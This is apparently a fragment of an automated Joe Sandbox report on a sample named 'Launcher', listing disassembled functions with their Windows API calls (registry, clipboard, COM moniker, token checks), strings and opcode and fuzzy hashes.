                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #4146
                                                                                                    • String ID:
                                                                                                    • API String ID: 1848845558-0
                                                                                                    • Opcode ID: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                                                    • Instruction ID: 1a64fe6dfda023630748e752118e9291354bbdf011a47c10bff355dc7b519354
                                                                                                    • Opcode Fuzzy Hash: db260932d695573c051feaa346e26578e55ea5e1411149e61a8cf7a75880d7ed
                                                                                                    • Instruction Fuzzy Hash: BAC0123700014DBBCF015E55DC01C9A3B6AEB44320B008500FD2C45161CB72D830A664
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __wgetmainargs
                                                                                                    • String ID:
                                                                                                    • API String ID: 1709950718-0
                                                                                                    • Opcode ID: f7aa2270a1ad0223746d85d773f384670b724715541d42462ecbf458f13b39d1
                                                                                                    • Instruction ID: 46defa10ac48d90080bde06c07dc2433a705aca1bc48eead403950da7d856ea2
                                                                                                    • Opcode Fuzzy Hash: f7aa2270a1ad0223746d85d773f384670b724715541d42462ecbf458f13b39d1
                                                                                                    • Instruction Fuzzy Hash: 0BD0C970A80332BF8708EB14EC47C023A6BA604F017032316F49152361D7E283508B00
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000000B,?,00000000), ref: 0066E19A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 909a554470ea547ee9641a9b079aab785ff3a589c5f27aaa1cb95b4275a1e8cf
                                                                                                    • Instruction ID: a9d7437e2132f80b1f4124206c0d7b255be70779c9c486badb4b78221b69f783
                                                                                                    • Opcode Fuzzy Hash: 909a554470ea547ee9641a9b079aab785ff3a589c5f27aaa1cb95b4275a1e8cf
                                                                                                    • Instruction Fuzzy Hash: 97C09B73144208B7E7211B51DC05F867F7AE795761F515111F7181D0B18B739471D754
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001102,00000000,00000003), ref: 006755F7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 70f350eb3008f1cd231b5aab65fb04b614d44e707e8596be026c3548552e5142
                                                                                                    • Instruction ID: 6f09ff3974e7fea5fd2d6a3907065ca0417cc59fa3e1e2e0c4d7afa7554ace56
                                                                                                    • Opcode Fuzzy Hash: 70f350eb3008f1cd231b5aab65fb04b614d44e707e8596be026c3548552e5142
                                                                                                    • Instruction Fuzzy Hash: 61C04C37044108BBDB025F91DC09CC57F7BFB99762B519111F658090718B739971EB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2241072151.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_5160000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b8750de9418a28f2c49cb0d02cf01ac34161201122c61743283025a8ec09645e
                                                                                                    • Instruction ID: a2763000f1242ac583f80fe106146a22310581877de7cd3dc7fe9edade097fe6
                                                                                                    • Opcode Fuzzy Hash: b8750de9418a28f2c49cb0d02cf01ac34161201122c61743283025a8ec09645e
                                                                                                    • Instruction Fuzzy Hash: D8D05E2000D3C54BD70353B8B41966C3F66DB86015F0800DAE4C987053DF58101AA317
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2241072151.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_5160000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6c9598d0b15253ffa8621d67cbca10bb898d10aa821dfa97acf67108e0ea2dc9
                                                                                                    • Instruction ID: d1e38f5c251d47f9fb2110b2ec0d8eaf3f5141d3d957541db08f6ee5d4e761eb
                                                                                                    • Opcode Fuzzy Hash: 6c9598d0b15253ffa8621d67cbca10bb898d10aa821dfa97acf67108e0ea2dc9
                                                                                                    • Instruction Fuzzy Hash: 9B2180307002098FDB09EB68E5187AE7AABEFC8300F10492DD405A77A6CF795C56CB95
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2240463445.000000000508D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0508D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_508d000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 48a71c99d30a2cd4d86df2c251f821d18a096fae4bb9b07019ec7b0fa395b53d
                                                                                                    • Instruction ID: 64bfb9df8fce7c4d42c1aede633e747ae7f69b443365941d6bb39c8a0b234836
                                                                                                    • Opcode Fuzzy Hash: 48a71c99d30a2cd4d86df2c251f821d18a096fae4bb9b07019ec7b0fa395b53d
                                                                                                    • Instruction Fuzzy Hash: D611D3B25443449EDB14EF24E984F3EBB96FB44314FA08B69D5894B281C33AD446CA62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2240463445.000000000508D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0508D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_508d000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b170dc52422bc8f42899f2b48c515b9e368bea00f5046dcded0eadef7b4da0f6
                                                                                                    • Instruction ID: 9f7d8ec5d3c939580dd0d33a8a7365025fbd23ee404318edd123c13a83006fea
                                                                                                    • Opcode Fuzzy Hash: b170dc52422bc8f42899f2b48c515b9e368bea00f5046dcded0eadef7b4da0f6
                                                                                                    • Instruction Fuzzy Hash: 4011CDB24487C48FD713DF24E984B25BFB1FB55214F1586EAC4858B293D33A944ACB62
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2241072151.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_5160000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4c2763b6bbe1a35deb15bc478962225da6b7c41bdc103d00c71e6dc5ce8325d3
                                                                                                    • Instruction ID: 5b831718991c738fef00d9c20806597aa6d2a1539fde4555570e03baa22cefd5
                                                                                                    • Opcode Fuzzy Hash: 4c2763b6bbe1a35deb15bc478962225da6b7c41bdc103d00c71e6dc5ce8325d3
                                                                                                    • Instruction Fuzzy Hash: 2811A0306403458FDB15DF64E918BAE7BB6FF88304F00492DD486AB667CF78680ACB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2241072151.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_5160000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c975543ceee92f9242c30e5480ef8096b3571b237d7f6feb6513995aee769fca
                                                                                                    • Instruction ID: d7d5efba3e10b435ea1264d022b3df95851762aad0f9f0fa571268ab6b7ad1a9
                                                                                                    • Opcode Fuzzy Hash: c975543ceee92f9242c30e5480ef8096b3571b237d7f6feb6513995aee769fca
                                                                                                    • Instruction Fuzzy Hash: A4D05E31B801494ACF08E7A8A4112DCBF61EF80219F0049ADC10597042DB67A50A83A6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2241072151.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_5160000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b1035d28617b2c88f15ed8ba473b4043ff471fd8f1e638b0d106bda78f0492f3
                                                                                                    • Instruction ID: 41fe43403d5c0b2b6266bb90d3ab64b945ba78d2e959b2599ae38e4f9be3b554
                                                                                                    • Opcode Fuzzy Hash: b1035d28617b2c88f15ed8ba473b4043ff471fd8f1e638b0d106bda78f0492f3
                                                                                                    • Instruction Fuzzy Hash: 3FB0123005438ECBDA8137E5F00EA7C3F5FEB8462BB400010FA8E81682EF7C151245A7
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067963E
                                                                                                    • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,0000009C,0067ACE5,?,?), ref: 0067966E
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,?), ref: 006797A0
                                                                                                    • wsprintfW.USER32 ref: 00679854
                                                                                                    • wsprintfW.USER32 ref: 0067986C
                                                                                                    • wsprintfW.USER32 ref: 00679925
                                                                                                    • wsprintfW.USER32 ref: 0067993B
                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 00679956
                                                                                                    • #538.MFC42U(00000000), ref: 0067997D
                                                                                                    • #538.MFC42U(00000000,00000000), ref: 00679996
                                                                                                    • #800.MFC42U(?,?,?,00000000,00000000), ref: 006799D6
                                                                                                    • #800.MFC42U ref: 006799EF
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00679A0F
                                                                                                    • RegEnumValueW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,?), ref: 00679A41
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00020019,?), ref: 00679AB4
                                                                                                    • #538.MFC42U(00000000), ref: 00679AC2
                                                                                                      • Part of subcall function 00679634: memset.MSVCRT ref: 00679884
                                                                                                      • Part of subcall function 00679634: _itow.MSVCRT ref: 006798C3
                                                                                                      • Part of subcall function 00679634: lstrcpyW.KERNEL32(00000000,<cannot coerce data to string>), ref: 006798FD
                                                                                                      • Part of subcall function 00679634: #800.MFC42U(00000000), ref: 00679AE7
                                                                                                      • Part of subcall function 00679634: SendMessageW.USER32(?,00001102,00000002,00000000), ref: 00679AFE
                                                                                                      • Part of subcall function 00679634: RegCloseKey.ADVAPI32(?), ref: 00679B07
                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,00000000,?), ref: 00679B16
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wsprintf$#538#800Enum$MessageSendValuelstrcpy$CloseH_prolog3InfoOpenQuery_itowmemset
                                                                                                    • String ID: %#04X%04X (%lu)$%#08X (%lu)$%s = %s$%s [%s] = %s$%s [<no name>] = %s$<cannot coerce data to string>
                                                                                                    • API String ID: 88432742-3653656851
                                                                                                    • Opcode ID: 3af90ef52b64c70ca917b49e953a272b1d08e86328212c3cca7d685e4e565b49
                                                                                                    • Instruction ID: e7f1e0257405a58c6739089fe6ac68dc11ab14fbdee243499bbeb61756db1e5a
                                                                                                    • Opcode Fuzzy Hash: 3af90ef52b64c70ca917b49e953a272b1d08e86328212c3cca7d685e4e565b49
                                                                                                    • Instruction Fuzzy Hash: BBF13C71900209AFDF15DFA8DC85AFEB7FAEF09300F14851AF51AE7291EA3099018B64
                                                                                                    APIs
                                                                                                    • #1662.MFC42U ref: 006748D9
                                                                                                    • #540.MFC42U ref: 006748F3
                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 00674912
                                                                                                    • CreateBindCtx.OLE32(00000000,?), ref: 00674936
                                                                                                    • MkParseDisplayName.OLE32(?,00000000,00000000,00000000), ref: 00674971
                                                                                                    • #2644.MFC42U ref: 006749D1
                                                                                                    • #2810.MFC42U(?,MkParseDisplayName(... "%s" ...) failed.,?), ref: 006749E9
                                                                                                    • #800.MFC42U(?,00000000), ref: 00674A19
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00674A30
                                                                                                    • #2810.MFC42U(?,Warning: MkParseDisplayName only ate up to "%s".,?), ref: 00674A82
                                                                                                    • #2644.MFC42U ref: 00674B42
                                                                                                    • #800.MFC42U ref: 00674B5D
                                                                                                    Strings
                                                                                                    • MkParseDisplayName(... "%s" ...) failed., xrefs: 006749DD
                                                                                                    • Warning: MkParseDisplayName only ate up to "%s"., xrefs: 00674A76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2644#2810#800$#1662#540BindCreateDisplayNameParselstrcpylstrlen
                                                                                                    • String ID: MkParseDisplayName(... "%s" ...) failed.$Warning: MkParseDisplayName only ate up to "%s".
                                                                                                    • API String ID: 3470803309-1365492349
                                                                                                    • Opcode ID: 212a4fbf293096b79caa1a9864e3cb67e2efad97b947f4b30f803edf7c0ed217
                                                                                                    • Instruction ID: 066c67b1b91f77a77a08df9f7fdbc1322ef7f371859bd51124712817da924755
                                                                                                    • Opcode Fuzzy Hash: 212a4fbf293096b79caa1a9864e3cb67e2efad97b947f4b30f803edf7c0ed217
                                                                                                    • Instruction Fuzzy Hash: D081CE75901229AFCB60EFA4DC8DB99B7B5FF48311F1042E9E409A7260DB34AE84CF14
                                                                                                    APIs
                                                                                                      • Part of subcall function 006778ED: GetFocus.USER32 ref: 006778ED
                                                                                                      • Part of subcall function 006778ED: #2859.MFC42U(00000000), ref: 006778F4
                                                                                                      • Part of subcall function 00677980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0067798C
                                                                                                    • GlobalAlloc.KERNEL32(00002002,00000200), ref: 00673522
                                                                                                    • GlobalLock.KERNEL32(?), ref: 00673534
                                                                                                    • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00673553
                                                                                                    • wsprintfW.USER32 ref: 00673650
                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 0067365F
                                                                                                    • EmptyClipboard.USER32 ref: 00673670
                                                                                                    • SetClipboardData.USER32(0000000D,?), ref: 0067367E
                                                                                                    • CloseClipboard.USER32 ref: 00673684
                                                                                                      • Part of subcall function 006778FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0067790C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlockwsprintf
                                                                                                    • String ID: <object classid="clsid:%s"></object>$P
                                                                                                    • API String ID: 2486233384-3677239044
                                                                                                    • Opcode ID: 44bd795a1defbc06722170287eb1b7fb873e942834bd84af054d73690a4bee88
                                                                                                    • Instruction ID: 21dc0b9e46308a9f1692c82bf0765299d3ba90d138ef9baf24fd228b3922c847
                                                                                                    • Opcode Fuzzy Hash: 44bd795a1defbc06722170287eb1b7fb873e942834bd84af054d73690a4bee88
                                                                                                    • Instruction Fuzzy Hash: 2851A1749112289FEB60DB64CD45B99B7B6FF08300F0181EAE54DA7291EB745E84CF16
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00020008,000000FF), ref: 0067DA51
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0067DA58
                                                                                                    • malloc.MSVCRT ref: 0067DA69
                                                                                                    • GetTokenInformation.ADVAPI32(000000FF,00000002,00000000,00008000,?), ref: 0067DA81
                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0067DAA2
                                                                                                    • EqualSid.ADVAPI32(00000004,?), ref: 0067DABD
                                                                                                    • FreeSid.ADVAPI32(00000000), ref: 0067DAE4
                                                                                                    • free.MSVCRT ref: 0067DAEF
                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0067DAFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AllocateCloseCurrentEqualFreeHandleInformationInitializeOpenfreemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152120180-0
                                                                                                    • Opcode ID: 70f4bcf6dd2bf17321860d7271be7e9a12222e60730699b3a33b811ed976f8dc
                                                                                                    • Instruction ID: 02adae3a22796d65a569c387f632f23cb630c810272a85312ab6c1540ac84269
                                                                                                    • Opcode Fuzzy Hash: 70f4bcf6dd2bf17321860d7271be7e9a12222e60730699b3a33b811ed976f8dc
                                                                                                    • Instruction Fuzzy Hash: 61318431A0421ABFDB10DFA4DD89ABFBBBAFF04711F244629E915E2290DB309D05CB50
                                                                                                    APIs
                                                                                                      • Part of subcall function 006778ED: GetFocus.USER32 ref: 006778ED
                                                                                                      • Part of subcall function 006778ED: #2859.MFC42U(00000000), ref: 006778F4
                                                                                                      • Part of subcall function 00677980: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0067798C
                                                                                                    • GlobalAlloc.KERNEL32(00002002,00000080), ref: 00672F82
                                                                                                    • GlobalLock.KERNEL32(?), ref: 00672F8E
                                                                                                    • StringFromGUID2.OLE32(-00000008,?,00000028), ref: 00672FA3
                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 00672FAC
                                                                                                    • EmptyClipboard.USER32 ref: 00672FBA
                                                                                                    • SetClipboardData.USER32(0000000D,?), ref: 00672FC5
                                                                                                    • CloseClipboard.USER32 ref: 00672FCB
                                                                                                      • Part of subcall function 006778FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 0067790C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$MessageSend$#2859AllocCloseDataEmptyFocusFromLockStringUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 1702833241-0
                                                                                                    • Opcode ID: c15850610e03cf088d1c7b9f9a4775d7b58801f828e39ea77ad691fae9d7cbd4
                                                                                                    • Instruction ID: bcc5c7b9ebbf25d043877527435d4914b79fe0be41d1f30ffcd68716c9eb6689
                                                                                                    • Opcode Fuzzy Hash: c15850610e03cf088d1c7b9f9a4775d7b58801f828e39ea77ad691fae9d7cbd4
                                                                                                    • Instruction Fuzzy Hash: F6214530D0020AEFDF10EBA4D85ABADBBB2FF44301F108169E515A73A1EB784E40CB55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 45b51006e005ba2f8b8eaee3f77aa5e79814a15718928fcffc0cc656bfce1a10
                                                                                                    • Instruction ID: a546892f1a33c3c7d54f27712a79ea46142296626a0f4e88b40149136e0605b2
                                                                                                    • Opcode Fuzzy Hash: 45b51006e005ba2f8b8eaee3f77aa5e79814a15718928fcffc0cc656bfce1a10
                                                                                                    • Instruction Fuzzy Hash: 9D21E67750011AFBD724DB94DC45ABFB76AEB10361F20821EF909EA250EB74DD4097A0
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0067FE45
                                                                                                    • memset.MSVCRT ref: 0067FE6B
                                                                                                    • memset.MSVCRT ref: 0067FEF5
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0067FF11
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0067FF31
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0067FF3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 1045392073-0
                                                                                                    • Opcode ID: 9d02613156c626cc6e0014ac079b684a5cce8a9bf52d13a8c4340c07483bdedd
                                                                                                    • Instruction ID: d120f236b326748642be2a3b8ccf2d6a44f49914eed36c91440327868885a244
                                                                                                    • Opcode Fuzzy Hash: 9d02613156c626cc6e0014ac079b684a5cce8a9bf52d13a8c4340c07483bdedd
                                                                                                    • Instruction Fuzzy Hash: 26313A75D0521C9BDF20DFA0D989BCCBBB8AF18300F1041AAE44CAB250EB719A848F04
                                                                                                    APIs
                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0067FD12
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0067FD21
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0067FD2A
                                                                                                    • GetTickCount.KERNEL32 ref: 0067FD33
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0067FD48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 1445889803-0
                                                                                                    • Opcode ID: a41a9ade2a05a4c362ed6c5e43bb94ddb7fc792fe4eb4c13da42e22f5e5d5619
                                                                                                    • Instruction ID: 8af16f273e4b0613a037abbd35173e6a09d07b5cc15ec6443962a951f1d5deb5
                                                                                                    • Opcode Fuzzy Hash: a41a9ade2a05a4c362ed6c5e43bb94ddb7fc792fe4eb4c13da42e22f5e5d5619
                                                                                                    • Instruction Fuzzy Hash: 16114871D01209EBCB20DBB8D94CAAEBBF6FF58B51F515966E442E7310EB359B408B00
                                                                                                    APIs
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0067F602,(;h), ref: 0067F4D3
                                                                                                    • UnhandledExceptionFilter.KERNEL32(0067F602,?,0067F602,(;h), ref: 0067F4DC
                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,0067F602,(;h), ref: 0067F4E7
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,0067F602,(;h), ref: 0067F4EE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                    • String ID:
